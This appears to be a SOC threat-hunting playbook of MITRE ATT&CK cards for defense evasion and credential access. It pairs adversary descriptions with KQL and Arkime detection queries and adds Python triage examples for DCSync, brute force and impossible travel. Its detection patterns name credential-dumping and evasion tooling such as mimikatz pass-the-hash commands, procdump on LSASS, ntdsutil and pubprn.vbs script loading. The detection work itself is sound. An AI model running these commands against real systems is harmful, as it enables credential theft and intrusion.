[KQL] Sysmon Registry — malicious SSP/auth package added to LSA
winlog.event_id: (12 OR 13) AND registry.path: "*\\System\\CurrentControlSet\\Control\\Lsa\\Authentication Packages*"
T1578

Modify Cloud Compute Infrastructure

[MITRE]
Adversaries disable VPC Flow Logs, modify Security Groups to allow inbound C2, or alter routing tables to hide network traffic and enable access from the internet without detection.
[KQL] CloudTrail — AWS network monitoring/logging deletion
event.dataset: "aws.cloudtrail" AND event.action: ("DeleteFlowLogs" OR "StopLogging" OR "DeleteTrail")
[KQL] Azure — NSG security rule writes
event.dataset: "azure.activitylogs" AND event.action: "Microsoft.Network/networkSecurityGroups/securityRules/write"
T1666

Modify Cloud Resource Hierarchy

[MITRE]
Adversaries detach a compromised cloud subscription from its parent organization, instantly dropping all inherited security controls and logging — blinding the SOC to that account's activity.
[KQL] CloudTrail/Azure — accounts removed from central management orgs
(event.dataset: "aws.cloudtrail" AND event.action: "RemoveAccountFromOrganization") OR (event.dataset: "azure.activitylogs" AND event.action: "Microsoft.Management/managementGroups/subscriptions/delete")
T1601

Modify System Image

[MITRE]
Adversaries modify the firmware/system image of network appliances (Cisco, Fortinet, F5) — appliances that can't run standard EDR — providing a completely undetectable haven to sniff traffic or maintain persistence.
[KQL] Network device syslog — firmware image copy/update commands from untrusted sources
event.dataset: ("cisco.ios" OR "fortinet.firewall") AND message: ("*copy tftp flash*" OR "*execute restore image*") AND NOT source.ip: "10.0.x.x"
-- 10.0.x.x is a placeholder: substitute the management subnet that is allowed to push images
T1647

Plist File Modification

[MITRE]
On macOS, adversaries modify .plist files to hide applications from the Dock, prevent them from appearing in Force Quit, or inject malicious DYLD_INSERT_LIBRARIES environment variables to hook legitimate apps.
[KQL] macOS — defaults write modifying LSUIElement or LSEnvironment keys
process.name: ("defaults" OR "plutil") AND process.command_line: ("* write * LSUIElement *" OR "* write * LSEnvironment *")
T1542

Pre-OS Boot (Defense Evasion)

[MITRE]
UEFI/Bootkit implants execute before the OS and its security tools load — actively patching the OS kernel in memory to blind EDR tools and hide processes and network connections from the OS itself.
[KQL] Sysmon — BIOS/UEFI firmware flashing utilities executed
process.name: ("afuwin64.exe" OR "fptw64.exe" OR "fwupdlocal.exe")
T1620

Reflective Code Loading

[MITRE]
Adversaries load compiled malware directly into memory from scripts (fileless malware) using PowerShell Reflection APIs — no file ever hits disk, bypassing file-based AV scanning entirely.
[KQL] PS Script Block — .NET Reflection loading binaries into memory
winlog.event_id: 4104 AND powershell.file.script_block_text: ("*[System.Reflection.Assembly]::Load*" OR "*[Reflection.Assembly]::Load*")
T1207

Rogue Domain Controller

[MITRE]
Adversaries use DCShadow/DCSync to register a compromised workstation as a fake DC, enabling hash extraction of any user or AD backdoor injection using legitimate replication protocols — bypassing normal auth logs.
[KQL] Windows — non-DC account requesting AD replication (DCSync)
winlog.event_id: 4662 AND winlog.event_data.Properties: ("*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2*" OR "*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*") AND NOT user.name: "*$"
[Arkime] DRSUAPI replication traffic from non-DC workstations
dcerpc.opnum == 3 AND NOT ip.src == 10.0.0.0/24
T1014

Rootkit

[MITRE]
Rootkits operate at kernel level (Ring 0), hooking OS APIs like NtQuerySystemInformation to actively hide the adversary's processes and files from Task Manager and EDR — making them completely invisible to the OS.
[KQL] Sysmon — suspicious .sys drivers loaded from user-writable paths
winlog.event_id: 6 AND file.path: ("*\\Temp\\*.sys" OR "*\\AppData\\*.sys" OR "*\\Users\\Public\\*.sys")
T1679

Selective Exclusion

[MITRE]
Instead of disabling AV entirely (which generates massive alerts), adversaries add a targeted exclusion for only the folder where their malware lives — the AV keeps running but ignores the payload.
[KQL] Sysmon — Add-MpPreference adding exclusion path/process/extension
process.name: ("powershell.exe" OR "cmd.exe") AND process.command_line: ("*Add-MpPreference -ExclusionPath*" OR "*Add-MpPreference -ExclusionProcess*" OR "*Add-MpPreference -ExclusionExtension*")
T1553

Subvert Trust Controls

[MITRE]
Adversaries steal legitimate code-signing certificates, modify SIP to make unsigned files appear signed, or install malicious root certificates so the OS inherently trusts their malware.
[KQL] Sysmon — certutil adding certs to Root or TrustedPublisher store
process.name: "certutil.exe" AND process.command_line: ("*-addstore*" OR "*-importpfx*") AND process.command_line: ("*Root*" OR "*TrustedPublisher*")
T1216

System Script Proxy Execution

[MITRE]
Adversaries use default signed Windows scripts (pubprn.vbs, slmgr.vbs, manage-bde.wsf) with crafted arguments to proxy malicious payload execution — bypassing script execution restrictions because the scripts are Microsoft-signed.
[KQL] Sysmon — pubprn.vbs abused to execute remote payload
process.name: ("wscript.exe" OR "cscript.exe") AND process.command_line: "*pubprn.vbs 127.0.0.1 script:http*"
T1221

Template Injection

[MITRE]
Adversaries send harmless-looking .docx files (no macros, bypassing email gateways) that on open dynamically fetch a malicious macro-enabled template (.dotm) from the internet.
[KQL] Sysmon — Word/Excel making outbound network connections upon document open
winlog.event_id: 3 AND process.name: ("WINWORD.EXE" OR "EXCEL.EXE") AND network.direction: "outbound" AND destination.port: (80 OR 443 OR 445) AND NOT destination.ip: ("10.0.0.0/8" OR "192.168.0.0/16")
[Arkime] HTTP download of .dotm macro-enabled Office templates
http.request.uri matches "\.dotm$" OR http.response.headers.content_type contains "application/vnd.ms-word.template.macroEnabled"
T1205

Traffic Signaling (Defense Evasion)

[MITRE]
Port Knocking keeps the C2 port completely closed (evading Shodan and vulnerability scanners) — only opening temporarily when a specific secret packet sequence is received from the adversary.
[KQL] Linux — raw packet sniffers run by non-admin (waiting for knock sequence)
process.name: ("tcpdump" OR "bpftool" OR "snort") AND NOT user.name: "root"
T1127

Trusted Developer Utilities Proxy Execution

[MITRE]
Adversaries abuse MSBuild.exe, csc.exe, or jsc.exe to compile C#/.NET payloads directly in memory — bypassing static AV checks because the source code is compiled locally and never written to disk as an executable.
[KQL] Sysmon — MSBuild compiling from user-writable or temp folders
process.name: ("MSBuild.exe" OR "csc.exe" OR "jsc.exe") AND process.command_line: ("*\\AppData\\*" OR "*\\Temp\\*" OR "*\\Users\\Public\\*")
T1535

Unused/Unsupported Cloud Regions

[MITRE]
Adversaries spin up rogue cloud infrastructure in regions the organization never uses — invisible to SOC dashboards filtered to primary regions like us-east-1 — enabling weeks of undetected activity.
[KQL] CloudTrail — infrastructure creation in non-standard AWS regions
event.dataset: "aws.cloudtrail" AND event.action: ("RunInstances" OR "CreateVpc") AND NOT aws.region: ("us-east-1" OR "us-east-2" OR "us-west-1" OR "us-west-2")
T1550

Use Alternate Authentication Material (Defense Evasion)

[MITRE]
Adversaries bypass MFA and password resets using stolen NTLM hashes (Pass-the-Hash), Kerberos tickets (Pass-the-Ticket), or web session cookies — authenticating without knowing the plaintext password.
[KQL] Windows — Pass-the-Hash indicator (Logon Type 9 + seclogo process)
winlog.event_id: 4624 AND winlog.logon.type: 9 AND winlog.event_data.LogonProcessName: "seclogo"
[KQL] Sysmon — Mimikatz PtH/PtT command line indicators
process.command_line: "*sekurlsa::pth*" OR process.command_line: "*kerberos::ptt*"
T1078

Valid Accounts (Defense Evasion)

[MITRE]
Using a valid account is the ultimate defense evasion — logging in as the IT Director looks exactly like the IT Director working from home. No exploits, no malware, no alerts. Look for behavioral anomalies instead.
[KQL] Windows — service accounts logging in interactively (behavioral anomaly)
winlog.event_id: 4624 AND winlog.logon.type: (2 OR 10) AND user.name: ("svc_*" OR "*_svc")
T1497

Virtualization/Sandbox Evasion

[MITRE]
Adversaries check WMI BIOS data, disk size (<60GB), MAC OUI (VMware/VirtualBox prefixes), or running analysis tool processes — if sandbox detected, malware exits cleanly and appears benign to the analyst.
[KQL] Sysmon — WMI queries for hardware metrics (sandbox detection checks)
process.name: "wmic.exe" AND process.command_line: ("*computersystem get*" OR "*bios get*" OR "*memorychip*")
T1600

Weaken Encryption

[MITRE]
Adversaries downgrade network encryption (forcing NTLMv1 instead of NTLMv2, or enabling SMBv1) to enable successful Man-in-the-Middle attacks and password cracking on the local network.
[KQL] Sysmon Registry — LmCompatibilityLevel modification (NTLMv1 downgrade)
winlog.event_id: (12 OR 13) AND registry.path: "*\\System\\CurrentControlSet\\Control\\Lsa\\LmCompatibilityLevel"
T1220

XSL Script Processing

[MITRE]
Adversaries abuse wmic.exe or msxsl.exe to execute malicious XSL files containing embedded JScript/VBScript — bypassing Application Whitelisting since wmic.exe is a trusted Microsoft binary.
[KQL] Sysmon — wmic executing a remote internet-hosted XSL stylesheet
process.name: "wmic.exe" AND process.command_line: ("*/format:http://*" OR "*/format:https://*")
Credential Access TA0006
Techniques for stealing account names and passwords. Credentials allow adversaries to access systems, move laterally, and enable persistence mechanisms.
T1003

OS Credential Dumping

[MITRE]

Why they do it: Adversaries attempt to dump credentials from LSASS, SAM, or NTDS to obtain account login material (hashes or clear text passwords).

[KQL] LSASS dump file creation (not from werfault — suspicious)
file_name: "lsass*.dmp" AND NOT process_name: "werfault.exe"
process.name: procdump.exe AND process.command_line: *lsass.exe*
[KQL] Mimikatz and credential dumping tools
process.name: mimikatz.exe AND process.command_line: *sekurlsa* AND process.command_line: (*minidump* OR *logonPasswords*)
process.name: rundll32.exe AND process.command_line: *comsvcs.dll*
process.name: rundll32.exe AND process.command_line: *Minidump*
[KQL] Suspicious LSASS parent/child process relationships
process.name: lsass.exe AND process.parent.name: (explorer.exe OR cmd.exe OR lsass.exe)
process.parent.name: lsass.exe AND process.name: (cmd.exe OR powershell.exe OR regsvr32.exe OR mstsc.exe OR dllhost.exe)
[KQL] WDigest registry modification — forces cleartext passwords in memory
event.type: ("creation" OR "change") AND registry.path: "HKLM\\SYSTEM\\*ControlSet*\\Control\\SecurityProviders\\WDigest\\UseLogonCredential" AND registry.data.strings: "1"
[KQL] T1003.003 NTDS — dumping Active Directory credentials
process.command_line: *NTDS.dit*
process.name: (ntdsutil.exe OR secretsdump.py OR vssadmin.exe OR wmic.exe)
event.code: 4688 AND process.name: ("mimikatz.exe" OR "procdump.exe" OR "ntdsutil.exe" OR "powershell.exe") AND process.command_line: (*Invoke* AND (*Mimikatz* OR *CachedCredentials* OR *LSADump* OR *SAMDump*))
[KQL] SAM registry key access by suspicious processes
event.code: 4663 AND process.name: ("mimikatz.exe" OR "procdump.exe" OR "reg.exe" OR "powershell.exe" OR "wmic.exe" OR "schtasks.exe" OR "cmd.exe") AND process.args: "\SAM"
[KQL] Procdump capturing LSASS (event 4688)
event.code: 4688 AND process.name: procdump.exe AND process.command_line: (*-ma* AND *lsass*)
[KQL] Unauthorized access to credential storage files
event.code: 4663 AND process.args: (*\config\SAM* OR *\ntds.dit* OR *\policy\secrets* OR *\cache*)
T1110

Brute Force

[MITRE]
[KQL] Logon failure frequency analysis — brute force detection
event.code: (4625 OR 4776 OR 5379 OR 530 OR 533 OR 7038)
-- 4625: Failed logon | 4776: Local auth attempt | 5379: Credential manager read
-- 530: Logon outside allowed hours | 533: User not authorized on this machine (pre-Vista IDs)
[KQL] Known brute force tools
hashcat.exe OR hydra OR crackmapexec OR poshC2 OR medusa OR ncrack OR patator OR john OR w3af
nmap AND brute
[KQL] T1110.004 Credential Stuffing — many failed auth attempts across accounts
event.code: (4625 OR 5379)
kerbrute.exe
sshpass
T1212

Exploitation for Credential Access

[MITRE]
[KQL] Kerberos manipulation — determine if authorized pentesting or sysadmin activity
event.code: (4768 OR 4769 OR 4771 OR 675)
[KQL] Coercion of local NTLM auth via HTTP (Printer Spooler / DavSetCookie)
event.type: ("start" OR "process_started") AND process.name: "rundll32.exe" AND process.args: ("?:\\Windows\\System32\\davclnt.dll,DavSetCookie" OR "?:\\Windows\\SysWOW64\\davclnt.dll,DavSetCookie") AND process.args: ("http*/print/pipe/*" OR "http*/pipe/spoolss" OR "http*/pipe/srvsvc")
T1552

Unsecured Credentials

[MITRE]
[KQL] CMD/PowerShell reading text/config files (credential search)
process.name: (cmd.exe OR powershell.exe) AND event.code: (1 OR 5 OR 7 OR 11) AND event.action: (Read OR Write) AND file.path: (*.txt OR *.xml OR *.json OR *.csv)
[KQL] PowerShell searching for credential keywords (event 4104)
event.code: 4104 AND powershell.file.script_block_text: (*password* OR *credential* OR *secret* OR *token* OR *passwd* OR *passphrase*)
[KQL] findstr hunting for passwords in files
"findstr /si password"
"findstr /si pass"
T1555

Credentials from Password Stores

[MITRE]
[KQL] KeePass or LastPass accessed with credential file patterns
process.name: ("keepass.exe" OR "lastpass.exe") AND (file.path: /%appdata%\.*\.kdbx/ OR file.path: /%systemroot%\system32\credmgr.exe/)
[KQL] Browser accessing credential/cookie database files
process.name: ("chrome.exe" OR "firefox.exe" OR "msedge.exe" OR "iexplore.exe" OR "brave.exe") AND file.path: ("*.sqlite" OR "*.logins.json" OR "*.key3.db" OR "*.signons.sqlite" OR "*.signons3.txt")
[Info] Also search Kibana for unauthorized access to SAM, NTDS.dit, LSASS. For Linux: /etc/passwd and /etc/shadow access.
Windows: LSASS process access, SAM registry, NTDS.dit file access
Linux: /etc/passwd, /etc/shadow
Use event.code: 4663 with ObjectName containing SAM or NTDS.dit
T1003.003

OS Credential Dumping: NTDS

[MITRE]
Adversaries dump the NTDS.dit Active Directory database to extract all domain password hashes. Requires DC access. Common tools: ntdsutil, secretsdump, vssadmin (VSS snapshot), wmic.
[KQL] NTDS.dit referenced in command line or process args
process.command_line: *NTDS.dit*
process.name: (ntdsutil.exe OR vssadmin.exe OR wmic.exe)
[KQL] Suspicious credential dump tool execution
event.code: 4688 AND process.name: ("mimikatz.exe" OR "procdump.exe" OR "ntdsutil.exe" OR "powershell.exe") AND process.command_line: (*Invoke-Mimikatz* OR *LSADump* OR *SAMDump*)
[KQL] Replication requests to DC — DCSync attack indicator (Ev4662 with DS-Replication GUIDs)
event.code: 4662 AND winlog.event_data.AccessMask: "0x100" AND winlog.event_data.Properties: (
  "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" OR
  "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2" OR
  "9923a32a-3607-11d2-b9be-0000f87a36b2" OR
  "89e95b76-444d-4c62-991a-0facbeda640c"
)
[KQL] procdump targeting lsass (also pulls domain creds from memory)
event.code: 4688 AND process.name: procdump.exe AND process.command_line: (*-ma* AND *lsass*)
[KQL] Access to SAM or NTDS.dit credential storage files
event.code: 4663 AND process.name: ("mimikatz.exe" OR "procdump.exe" OR "reg.exe" OR "powershell.exe" OR "wmic.exe") AND process.args: ("\SAM" OR "ntds.dit")
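The DCSync query above (and the one on the Rogue Domain Controller card) keys on the AccessMask and the replication GUIDs inside the multi-line Properties field of Event 4662. The routine below is an added example, not part of the playbook, that parses those fields the same way and applies the exclusions a hunter needs: machine accounts and a site-specific allowlist such as an Azure AD Connect MSOL_ account (the account names and events are constructed).

```python
"""Triage Windows 4662 (operation on an AD object) events for the DCSync
pattern: a control-access request carrying a replication extended right,
made by a principal that is not a domain controller."""
import re

# Extended rights (controlAccessRight GUIDs) needed to replicate directory data.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
    "9923a32a-3607-11d2-b9be-0000f87a36b2": "DS-Install-Replica",
}
CONTROL_ACCESS = 0x100   # ADS_RIGHT_DS_CONTROL_ACCESS bit in AccessMask
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def replication_rights(properties):
    """Pull the replication extended rights out of the multi-line Properties
    field; other GUIDs in it (object class, attribute sets) are ignored."""
    found = []
    for guid in GUID_RE.findall(properties):
        name = REPLICATION_RIGHTS.get(guid.lower())
        if name and name not in found:
            found.append(name)
    return found


def triage_4662(event, replication_allowlist=frozenset()):
    """Return a finding dict for a DCSync-looking event, else None.

    replication_allowlist: lowercase account names that replicate legitimately
    but are not machine accounts (for example an Azure AD Connect MSOL_ account)."""
    if str(event.get("event_id")) != "4662":
        return None
    if int(event.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS == 0:
        return None
    rights = replication_rights(event.get("Properties", ""))
    if not rights:
        return None
    user = event["SubjectUserName"]
    if user.endswith("$"):
        return None          # DC computer accounts replicate with each other
    if user.lower() in replication_allowlist:
        return None
    # Get-Changes-All is the right that returns secrets (password hashes);
    # Get-Changes alone only reads non-secret attributes.
    severity = "high" if "DS-Replication-Get-Changes-All" in rights else "medium"
    return {"user": user, "domain": event.get("SubjectDomainName", ""),
            "rights": rights, "severity": severity,
            "object": event.get("ObjectName", "")}


# Constructed sample events in the shape of winlog.event_data (not real logs).
PROPERTIES_DCSYNC = ("Control Access\n\t\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n"
                     "\t\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                     "\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}")   # object class GUID, not a right
PROPERTIES_BENIGN = "Write Property\n\t{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}"   # constructed attribute GUID
SAMPLE_EVENTS = [
    {"event_id": "4662", "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
     "AccessMask": "0x100", "ObjectName": "DC=corp,DC=example", "Properties": PROPERTIES_DCSYNC},
    {"event_id": "4662", "SubjectUserName": "DC01$", "SubjectDomainName": "CORP",
     "AccessMask": "0x100", "ObjectName": "DC=corp,DC=example", "Properties": PROPERTIES_DCSYNC},
    {"event_id": "4662", "SubjectUserName": "MSOL_a1b2c3", "SubjectDomainName": "CORP",
     "AccessMask": "0x100", "ObjectName": "DC=corp,DC=example", "Properties": PROPERTIES_DCSYNC},
    {"event_id": "4662", "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
     "AccessMask": "0x10", "ObjectName": "CN=jdoe,OU=Users,DC=corp,DC=example",
     "Properties": PROPERTIES_BENIGN},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["SubjectUserName"], "->", triage_4662(ev, {"msol_a1b2c3"}))
```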
T1110.004

Brute Force: Credential Stuffing

[MITRE]
Adversaries use credentials from previous data breaches (username/password combos) against services. Unlike password spraying, credential stuffing uses real credentials from breached databases.
[KQL] Multiple failed authentications across various accounts (Ev4625)
event.code: (4625 OR 5379)
-- High volume of 4625 across many different user accounts = credential stuffing
-- 5379: Credential Manager credentials read
[KQL] Kerbrute tool usage (credential stuffing via Kerberos)
process.name: kerbrute.exe
[KQL] sshpass on Linux (credential stuffing via SSH)
process.name: sshpass
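The Brute Force and Credential Stuffing cards both rest on frequency analysis of 4625: the event IDs alone return every failed logon, and the signal is in how failures cluster per source, per account and per time window. The following windowed analysis is an added example, not part of the playbook; the thresholds are placeholders to tune per site and the log lines are constructed.

```python
"""Frequency analysis of Windows 4625 (failed logon) events: group failures by
source and time window, then separate a single-account brute force from the
many-accounts-few-tries shape shared by password spraying and credential
stuffing. Input is a constructed key=value log; a real pipeline reads ECS docs."""
from collections import defaultdict
from datetime import datetime, timedelta

# 4625 SubStatus values (NTSTATUS, lowercase as winlog writes them) that say why
# the logon failed. Two of them are the modern form of the legacy event IDs
# the card lists (530 and 533).
SUBSTATUS = {
    "0xc0000064": "user does not exist",
    "0xc000006a": "bad password",
    "0xc000006f": "logon outside allowed hours",   # legacy 530
    "0xc0000070": "workstation restriction",       # legacy 533
    "0xc0000072": "account disabled",
    "0xc0000234": "account locked out",
}

WINDOW = timedelta(minutes=10)   # fixed buckets; placeholder, tune for logon volume
BRUTE_FORCE_MIN = 20             # failures against a single account per window
SPRAY_MIN_ACCOUNTS = 10          # distinct accounts from one source per window
SPRAY_MAX_PER_ACCOUNT = 2        # few tries per account = spray/stuffing, not brute force


def parse_line(line):
    """'2024-05-01T10:00:00Z event_id=4625 user=alice src=... sub=0x...' -> dict."""
    ts, *pairs = line.split()
    rec = dict(p.split("=", 1) for p in pairs)
    rec["time"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return rec


def bucket(ts):
    """Start of the fixed window that contains ts."""
    epoch = datetime(1970, 1, 1)
    return epoch + WINDOW * ((ts - epoch) // WINDOW)


def analyze(lines):
    """Group 4625s by (source, window) and label the windows worth triaging."""
    stats = defaultdict(lambda: {"attempts": 0, "accounts": defaultdict(int),
                                 "reasons": defaultdict(int)})
    for line in lines:
        rec = parse_line(line)
        if rec.get("event_id") != "4625":
            continue
        s = stats[(rec["src"], bucket(rec["time"]))]
        s["attempts"] += 1
        s["accounts"][rec["user"].lower()] += 1
        s["reasons"][SUBSTATUS.get(rec.get("sub", "").lower(), "other")] += 1

    findings = []
    for (src, start), s in sorted(stats.items()):
        per_account = s["accounts"]
        busiest = max(per_account.values())
        if len(per_account) >= SPRAY_MIN_ACCOUNTS and busiest <= SPRAY_MAX_PER_ACCOUNT:
            # Many accounts, one or two tries each: the log alone cannot tell a
            # password spray from credential stuffing; the account list (breach
            # corpus vs. directory enumeration) and the sources decide that.
            verdict = "spray_or_stuffing"
        elif busiest >= BRUTE_FORCE_MIN:
            verdict = "brute_force"
        else:
            continue
        findings.append({"src": src, "window_start": start.isoformat(),
                         "verdict": verdict, "attempts": s["attempts"],
                         "accounts": len(per_account), "reasons": dict(s["reasons"])})
    return findings


def constructed_log():
    """Constructed sample, not real logs: one brute-force source, one spray-like
    source, a 530-style failure and a successful logon that must be ignored."""
    base = datetime(2024, 5, 1, 10, 0, 0)
    fmt = "%Y-%m-%dT%H:%M:%SZ"
    lines = [f"{(base + timedelta(seconds=10 * i)):{fmt}} event_id=4625 user=alice "
             f"src=203.0.113.5 sub=0xc000006a" for i in range(30)]
    lines += [f"{(base + timedelta(seconds=5 * i)):{fmt}} event_id=4625 user=user{i:02d} "
              f"src=198.51.100.7 sub=0xc000006a" for i in range(12)]
    lines.append(f"{base:{fmt}} event_id=4625 user=bob src=192.0.2.9 sub=0xc000006f")
    lines.append(f"{base:{fmt}} event_id=4624 user=bob src=192.0.2.9")
    return lines


if __name__ == "__main__":
    for finding in analyze(constructed_log()):
        print(finding)
```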
T1557

Adversary-in-the-Middle

[MITRE]
Adversaries intercept traffic (ARP spoofing, LLMNR/NBT-NS poisoning via Responder/Inveigh) to capture NTLMv2 hashes or relay authentication when machines look for non-existent file shares.
[KQL] Sysmon — unexpected processes binding to name resolution ports (Responder)
winlog.event_id: 3 AND network.direction: "inbound" AND destination.port: (137 OR 5355 OR 53) AND NOT process.name: ("svchost.exe" OR "System")
[Arkime] LLMNR/NBT-NS poisoning — high volume of name responses from single workstation
udp.port == 5355 OR udp.port == 137
T1187

Forced Authentication

[MITRE]
Adversaries drop malicious .LNK or .SCF files on shared drives — when a user opens the folder, Windows auto-fetches the icon from the adversary's server, handing over the NTLMv2 hash without any user interaction.
[KQL] Sysmon — outbound SMB connections leaving the corporate network
winlog.event_id: 3 AND destination.port: (445 OR 139) AND NOT destination.ip: ("10.0.0.0/8" OR "192.168.0.0/16" OR "172.16.0.0/12")
[Arkime] SMB NTLM auth leaving perimeter
smb.cmd == 0x73 AND ip.dst != 10.0.0.0/8
T1606

Forge Web Credentials

[MITRE]
Adversaries compromise ADFS or steal token-signing certificates to forge Golden SAML tokens — generating valid login tokens for any user, bypassing passwords, MFA, and Conditional Access for O365/AWS.
KQLWindows — ADFS DKM master key extraction (required to forge SAML)
winlog.event_id: 4662 AND winlog.event_data.ObjectName: "*ADFS\\Policy Store*" AND winlog.event_data.AccessMask: "0x100"
T1056

Input Capture

[MITRE]
Adversaries use keyloggers (GetAsyncKeyState, SetWindowsHookEx), clipboard monitors, or web form grabbers to capture credentials as the user types — bypassing encrypted password vaults by stealing passwords before they're stored.
KQLSysmon — processes making API calls associated with keylogging/hooking
winlog.event_id: 10 AND winlog.event_data.CallTrace: ("*GetAsyncKeyState*" OR "*SetWindowsHookEx*") AND NOT process.executable: "*\\Antivirus.exe"
T1556

Modify Authentication Process (Credential Access)

[MITRE]
Adversaries inject into the authentication process (Skeleton Key in lsass.exe, PAM backdoor on Linux) to capture plaintext passwords of every user who authenticates to the Domain Controller.
KQLSysmon — unsigned/untrusted DLLs injected into lsass.exe
winlog.event_id: 7 AND process.name: "lsass.exe" AND NOT file.path: "*\\Windows\\System32\\*" AND file.extension: "dll"
T1111

MFA Interception

[MITRE]
Adversaries bypass MFA via SIM swapping, SS7 network exploitation to intercept SMS codes, or AiTM phishing proxies (Evilginx2) that capture authenticated session cookies after the user completes the MFA challenge.
KQLAzure AD — successful logins where session token appears from different IP (Impossible Travel)
event.dataset: "azure.auditlogs" AND event.action: "User logged in" AND event.outcome: "success"
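The query above only selects successful sign-ins; the impossible-travel comparison itself has to be done over the results. The following is an added Python example (not part of the playbook) that performs that comparison: consecutive successful sign-ins by the same user from two source IPs are flagged when the implied travel speed is infeasible. The sign-in events, the IP-to-coordinate table and the 900 km/h cut-off are constructed for the example; in practice the coordinates come from a GeoIP lookup.

```python
"""Impossible-travel check over successful sign-in events (added example).

Flags a user whose consecutive successful sign-ins come from two source IPs
whose geographic distance cannot be covered in the elapsed time. The events
and the IP-to-location table are constructed for this example; in practice
the location comes from a GeoIP lookup.
"""
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

# Constructed GeoIP stand-in: source IP -> (latitude, longitude). Hypothetical values.
GEO = {
    "203.0.113.10": (40.7128, -74.0060),   # New York
    "203.0.113.11": (40.7306, -73.9352),   # nearby, same city
    "198.51.100.7": (52.5200, 13.4050),    # Berlin
}

MAX_SPEED_KMH = 900.0  # faster than a commercial flight -> infeasible (assumed cut-off)

# Constructed successful sign-in events in the shape the azure.auditlogs query returns
EVENTS = [
    {"@timestamp": "2024-05-01T08:00:00", "user.name": "alice", "source.ip": "203.0.113.10", "event.outcome": "success"},
    {"@timestamp": "2024-05-01T08:20:00", "user.name": "alice", "source.ip": "198.51.100.7", "event.outcome": "success"},
    {"@timestamp": "2024-05-01T09:00:00", "user.name": "bob", "source.ip": "203.0.113.10", "event.outcome": "success"},
    {"@timestamp": "2024-05-01T09:30:00", "user.name": "bob", "source.ip": "203.0.113.11", "event.outcome": "success"},
    {"@timestamp": "2024-05-01T09:40:00", "user.name": "carol", "source.ip": "198.51.100.7", "event.outcome": "failure"},
]


def haversine_km(a, b):
    """Great-circle distance in km between two (lat, lon) pairs."""
    lat1, lon1 = map(radians, a)
    lat2, lon2 = map(radians, b)
    dlat, dlon = lat2 - lat1, lon2 - lon1
    h = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(h))


def impossible_travel(events, geo=GEO, max_speed_kmh=MAX_SPEED_KMH):
    """Return [(user, previous_ip, current_ip, speed_kmh)] for infeasible consecutive sign-ins."""
    hits = []
    last = {}  # user -> (timestamp, ip) of the previous successful sign-in
    for ev in sorted(events, key=lambda e: e["@timestamp"]):
        if ev["event.outcome"] != "success":
            continue  # failed attempts do not establish a location
        user, ip = ev["user.name"], ev["source.ip"]
        ts = datetime.fromisoformat(ev["@timestamp"])
        if user in last:
            prev_ts, prev_ip = last[user]
            if prev_ip != ip and prev_ip in geo and ip in geo:
                hours = (ts - prev_ts).total_seconds() / 3600
                dist = haversine_km(geo[prev_ip], geo[ip])
                speed = dist / hours if hours > 0 else float("inf")
                if speed > max_speed_kmh:
                    hits.append((user, prev_ip, ip, round(speed)))
        last[user] = (ts, ip)
    return hits


if __name__ == "__main__":
    for user, ip_a, ip_b, speed in impossible_travel(EVENTS):
        print(f"{user}: {ip_a} -> {ip_b} implies {speed} km/h")
```

Two sign-ins from IPs in the same city pass (bob), while the 20-minute hop between continents is flagged (alice).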
T1621

MFA Request Generation

[MITRE]
MFA Fatigue / Prompt Bombing — adversaries spam a user with dozens of MFA push notifications late at night until the user clicks Approve just to make their phone stop buzzing, bypassing MFA without exploiting any vulnerability.
KQLOkta/Azure — multiple failed/denied MFA pushes for same user in short window
event.dataset: ("okta.system" OR "azure.auditlogs") AND event.action: ("user.mfa.attempt_bypass" OR "Authentication failed") AND event.reason: "*denied*" | stats count by user.name | where count > 5
T1040

Network Sniffing

[MITRE]
Adversaries capture network traffic to steal cleartext credentials (Telnet, FTP, HTTP) or NTLMv2 challenge-response packets for offline cracking using Hashcat — placing the NIC into promiscuous mode or running tcpdump/tshark.
KQLSysmon/Auditbeat — network sniffing utilities run by non-admin users
process.name: ("tcpdump" OR "tshark" OR "wireshark.exe" OR "pktmon.exe") AND NOT user.name: ("root" OR "SYSTEM")
ArkimeCleartext credentials traversing the network
http.authbasic OR ftp.request.command == "USER" OR ftp.request.command == "PASS"
T1528

Steal Application Access Token

[MITRE]
Adversaries compromise VMs and curl the cloud Instance Metadata Service (IMDS at 169.254.169.254) to steal temporary IAM role tokens — then use them from their own machine to access cloud storage or databases.
KQLSysmon/Auditbeat — non-standard processes querying cloud IMDS
network.direction: "outbound" AND destination.ip: "169.254.169.254" AND process.name: ("curl" OR "wget" OR "powershell.exe" OR "cmd.exe")
ArkimeHTTP GET requests for IAM security credentials from IMDS
http.request.uri contains "/latest/meta-data/iam/security-credentials/"
T1539

Steal Web Session Cookie

[MITRE]
Adversaries steal browser session cookies (SQLite databases) and import them into their own browser, instantly inheriting an authenticated O365/AWS session — completely bypassing passwords and MFA.
KQLSysmon — scripts/tools accessing Chrome cookie databases
process.name: ("powershell.exe" OR "cmd.exe" OR "python.exe") AND process.command_line: ("*\\AppData\\Local\\Google\\Chrome\\User Data\\*\\Network\\Cookies*")
T1649

Steal or Forge Authentication Certificates

[MITRE]
Adversaries exploit misconfigured AD CS certificate templates (ESC1-ESC8) to request certificates authenticating as any user including Domain Admins, or steal existing private keys to impersonate users/servers.
